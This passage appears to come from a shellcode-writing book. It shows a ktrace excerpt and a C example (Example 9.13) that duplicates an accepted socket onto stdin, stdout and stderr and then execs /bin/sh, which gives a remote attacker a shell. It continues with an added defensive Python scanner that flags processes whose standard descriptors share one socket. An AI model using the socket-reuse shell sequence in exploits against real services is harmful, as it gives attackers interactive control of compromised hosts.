
8 603 remote_format_strin RET accept 4
9 603 remote_format_strin CALL read(0x4,0xbfbff8f0,0x1f4
The program creates a network socket and starts listening on it. Then at line 7 a network connection is accepted, for which file descriptor number 4 is returned. The daemon then uses that file descriptor to read data from the client.
Imagine that at this point some sort of vulnerability that allows shellcode to be executed can be triggered. All we would have to do to get an interactive shell is execute the system calls in Example 9.13.
Example 9.13 dup
#include <unistd.h>

dup2(4, 0);                 /* fd 4 is the accepted connection: make it stdin */
dup2(4, 1);                 /* ... and stdout */
dup2(4, 2);                 /* ... and stderr */
execve("/bin/sh", 0, 0);    /* the shell inherits fds 0-2, so it talks over the socket */
Analysis
First, we dup stdin, stdout, and stder ...
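From the defender's side, the dup2/execve sequence above leaves a shell whose stdin, stdout and stderr all refer to one and the same socket. The following added example (not code from the book) flags processes in that state on Linux, where /proc/<pid>/fd/{0,1,2} resolve to "socket:[INODE]"; the procfs layout is an assumption of this example, and the sample fd tables are constructed.

```python
"""Flag processes whose fds 0, 1 and 2 all point at the same socket.

A shell started with dup2(sock,0); dup2(sock,1); dup2(sock,2); execve()
inherits exactly this descriptor layout. Assumes Linux /proc semantics,
where readlink(/proc/<pid>/fd/N) yields "socket:[INODE]" for sockets.
"""
import os
import re
from typing import Dict, Iterator, Optional, Tuple

SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")


def shared_socket_inode(fd_targets: Dict[int, str]) -> Optional[str]:
    """Return the inode if fds 0, 1 and 2 all resolve to the same socket.

    fd_targets maps fd number -> readlink() result. Any missing fd, any
    non-socket target, or differing inodes means "no match" (None).
    """
    inodes = set()
    for fd in (0, 1, 2):
        target = fd_targets.get(fd)
        if target is None:
            return None
        m = SOCKET_RE.match(target)
        if not m:
            return None
        inodes.add(m.group(1))
    return inodes.pop() if len(inodes) == 1 else None


def read_std_fds(pid: int, proc: str = "/proc") -> Dict[int, str]:
    """Collect link targets of fds 0-2 for one process; unreadable fds are skipped."""
    out: Dict[int, str] = {}
    for fd in (0, 1, 2):
        try:
            out[fd] = os.readlink(f"{proc}/{pid}/fd/{fd}")
        except OSError:
            pass
    return out


def scan_procfs(proc: str = "/proc") -> Iterator[Tuple[int, str, str]]:
    """Yield (pid, comm, inode) for every process with a shared std socket."""
    for name in os.listdir(proc):
        if not name.isdigit():
            continue
        pid = int(name)
        inode = shared_socket_inode(read_std_fds(pid, proc))
        if inode:
            try:
                with open(f"{proc}/{pid}/comm") as f:
                    comm = f.read().strip()
            except OSError:
                comm = "?"
            yield pid, comm, inode


# Constructed samples: fd tables of a socket-reusing shell, an ordinary
# terminal shell, and a process with only stdin/stdout on the socket.
SAMPLE_REUSED = {0: "socket:[84213]", 1: "socket:[84213]", 2: "socket:[84213]"}
SAMPLE_TERMINAL = {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}
SAMPLE_MIXED = {0: "socket:[84213]", 1: "socket:[84213]", 2: "/dev/null"}

if __name__ == "__main__":
    for pid, comm, inode in scan_procfs():
        print(f"pid {pid} ({comm}): fds 0-2 all on socket inode {inode}")
```

Services spawned by inetd-style superservers legitimately show the same layout, so treat the output as a triage list to check against the expected process inventory rather than as a verdict.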